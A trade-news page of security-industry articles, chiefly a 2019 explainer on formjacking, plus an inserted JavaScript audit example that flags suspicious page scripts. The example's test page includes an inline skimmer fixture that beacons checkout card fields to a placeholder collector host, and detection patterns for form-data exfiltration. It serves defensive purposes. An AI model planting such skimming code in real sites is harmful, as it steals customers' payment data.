
Joe Gittens

Formjacking, a newer way of stealing personal data online

Wednesday, October 16, 2019

Cyber Security Awareness Month is in full swing; social media is buzzing with extremely helpful content and resources, most of which are free, to help businesses and individuals gain and stay in control of their digital worlds. As the saying goes, “you learn something new every day,” or you should. Through social media related to #NCSAM, #cybersecurityawarenessmonth and #BeCyberAware, I heard about a newer way hackers are stealing data – formjacking.

I knew the term “jacking” meant stealing, but combining it with the word “form,” it could mean a variety of things, so I reached out to my friends at the Security Industry Association (SIA) for some guidance.

“Formjacking is the injection of malicious code into a seemingly trustworthy website form that relays a copy of the field inputs to an attacker,” Joe Gittens, director of standards, SIA, explained. “In these cases, the victim’s transaction with the trusted source is not interrupted; however, information from the form, which could include sensitive data, is relayed to the attacker.”

That literally gave me chills. I can’t speak for you, but I know I have filled out at least hundreds of forms in my digital life; reflecting back over my past 20 years, there’s no telling what data I’ve shared. And, with formjacking, here’s the kicker – there are no red flags for the average online user to look for. 

“Unlike with spoofing and phishing, there are very few tell-tale signs that a form has been compromised,” said Min Kyriannis, head, technology business development, Jaros, Baum & Bolles and member of SIA’s Cybersecurity Advisory Board. In fact, the only way to detect formjacking is looking at the code, “and, unless you’re trained, it’s hard to detect,” Gittens said.

It looks like the regular, everyday Joe who is going online and filling out forms has absolutely no way of knowing his data could be at risk, although end users can self-sabotage by installing browser plug-ins, Gittens said. Therefore, it’s mainly up to the company behind the online form to ensure people and their data are protected.

“Companies need to ensure that all software, plug-ins and any third-party applications or extensions have been vetted and check for vulnerabilities,” Kyriannis advised. “These need to be continuously checked, since software is constantly being updated.” 

It amazes me how smart cybercriminals/hackers truly are, and it’s important to never underestimate them. Think about it in these terms: once a threat is recognized and identified by the “good guys,” the “bad guys” have already moved on, “looking for more covert ways to harvest data,” Gittens said, in a way that’s the “easiest to hide and what’s most lucrative” for them, added Kyriannis.

Gittens identified partner trust as key and noted that formjacking can and has affected large and mom-and-pop institutions. “Just like with other attacks, understanding exactly what type of privileges a third-party service has on your website or your browser and only allowing the most trusted services into your ecosystem can help protect you and your business. Also, be careful about what types of information you are collecting in forms in case you are attacked. If you don’t have to collect sensitive data, don’t do it – contract a trusted third party to perform the transaction for you who has better security protocols in place and can provide you and your customers with assurances. The SIA Cybersecurity Advisory Board will soon look to provide guidance on how security stakeholders can foster more trust within the device and application ecosystem.”

Kyriannis concurs that trust is key, but “people with malicious intent will always find new ways to sneak under the radar. The industry must lead in bringing awareness to their clients, customers, etc., and self-awareness is critical – for end users, that means setting up security parameters for themselves,” such as tagging credit cards to constantly monitor charges. 

Formjacking Key Takeaways

  1. Any and all information shared via an online form is at risk of being stolen. 
  2. The only way to detect formjacking is to look at the code. 
  3. Ensure software, plug-ins and any third-party applications or extensions have been vetted and regularly check for vulnerabilities.
  4. Understand the exact privileges a third-party service has on your website/browser. 
  5. If you don’t have to collect sensitive data, don’t. 
  6. Set up security parameters for yourself.
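One way a site owner can act on takeaways 2 and 4 is a static audit of the scripts a page loads. The following is an added example, not code from the article or from SIA; the page HTML, the site origin `https://shop.example`, the vendor allowlist and every other host name are constructed placeholders.

```javascript
// Added example (not from the article or SIA): a static audit of a page's <script>
// tags, in the spirit of "look at the code". It reports third-party scripts from
// origins outside an allowlist, allowed ones lacking a Subresource Integrity hash,
// and inline scripts that both read form fields and contain a network sink.

const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const ATTR_RE = /([\w-]+)\s*=\s*"([^"]*)"/g;
// A skimmer must read form data and send it somewhere; both in one inline
// script is a signal for human review, not proof of compromise.
const FORM_READ_RE = /\.value\b|\bFormData\b|querySelector(?:All)?\(\s*["'](?:input|form)/;
const NETWORK_SINK_RE = /\bfetch\(|XMLHttpRequest|sendBeacon\(|new Image\(|\.src\s*=/;

function parseAttrs(raw) {
  const attrs = {};
  for (const m of raw.matchAll(ATTR_RE)) attrs[m[1].toLowerCase()] = m[2];
  return attrs;
}

function auditPageScripts(html, siteOrigin, allowedThirdParty) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    const attrs = parseAttrs(m[1]);
    if (attrs.src !== undefined) {
      let origin = null;
      try { origin = new URL(attrs.src, siteOrigin).origin; } catch {}
      if (origin === siteOrigin) continue; // first-party script
      if (!allowedThirdParty.includes(origin)) {
        findings.push({ kind: 'unexpected-origin', src: attrs.src });
      } else if (!attrs.integrity) {
        findings.push({ kind: 'missing-sri', src: attrs.src });
      }
    } else if (FORM_READ_RE.test(m[2]) && NETWORK_SINK_RE.test(m[2])) {
      findings.push({ kind: 'inline-form-exfil-pattern', snippet: m[2].trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed page (all hosts are placeholders): a first-party script, an allowed
// vendor with and without SRI, an unknown tracker, a benign inline script, and
// an inline fixture that reads the checkout form and beacons it to an unknown host.
const SAMPLE_HTML = `
<form id="checkout"><input name="card"><input name="cvv"></form>
<script src="/static/app.js"></script>
<script src="https://cdn.example-vendor.com/widget.js" integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="https://cdn.example-vendor.com/chat.js"></script>
<script src="https://stats.example-unknown.net/t.js"></script>
<script>console.log("page ready");</script>
<script>const f = document.querySelector("form"); f.addEventListener("submit", () => navigator.sendBeacon("https://collector.example-unknown.net/c", new FormData(f)));</script>`;
const REPORT = auditPageScripts(SAMPLE_HTML, 'https://shop.example', ['https://cdn.example-vendor.com']);
```

Run against the constructed page, REPORT lists the vendor script without SRI, the unknown tracker and the inline beaconing script; a real audit would pair this with a Content Security Policy so that unlisted origins are blocked at the browser rather than merely reported.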

Cyber:Secured Forum helps heat up the Lone Star State

Wednesday, May 29, 2019

Things are heating up here in the Lone Star State, which means air conditioning bills are about to go up, water will be consumed by the gallon, the smell of sunscreen and sun block will be everywhere, but most importantly, it means the Cyber:Secured Forum will be here before we know it at The Westin Dallas Park Central, July 29-31.

Senior Technical Director for NSA’s Cybersecurity Threat Operations Center (NCTOC), David Hogue, will be taking the stage on July 31st, 11:30am to 1:30pm, keynoting about fostering innovation and public-private partnerships in cyber defense. 

“The NSA is one of the most forward-thinking security organizations in the world,” Joe Gittens, director of standards, SIA told SSN. “David Hogue has been a technical expert on many of the agency’s cybersecurity threat mitigation efforts and a lead researcher on a number of high-profile breaches, like the Sony Pictures hack.” 

Attendees can look forward to the following take-aways from Hogue: 

  • Principles on how NSA is approaching cybersecurity innovation
  • How the security industry can partner in this overall mission; and
  • Ways the industry can develop solutions for managing gateways and cyber perimeters, hardening endpoints to meet best practices and standards, embracing comprehensive and automated threat intelligence and cultivating a culture of curiosity and innovation.


“I believe there is not a better voice to educate our industry on the emerging threats that enemies are deploying to interfere with the ever-connected nature of our nation,” Gittens said. “Security battlefronts are constantly changing, and David’s presentation will offer rare insights into how partnership and innovation within the security industry can lead to increasing success in the public and private sectors.”

I look forward to seeing everyone at Cyber:Secured and taking lots of notes on what Hogue has to offer! 


Should NFPA 730 go from guide to code?

SIA says no because of concerns about liability and the expense of retraining installers
11/28/2012

SILVER SPRING, Md.—A proposal to change NFPA 730, the National Fire Protection Association standard governing security systems, from a best-practices recommendation to a code is generating concerns from the security industry.

Brivo's Van Till to head SIA's Standards Committee

05/05/2011

BETHESDA, Md.—The Security Industry Association on April 28 announced that Steve Van Till, president and CEO of software as a service (SaaS) provider Brivo, has been appointed to the position of chair of SIA's Standards Committee.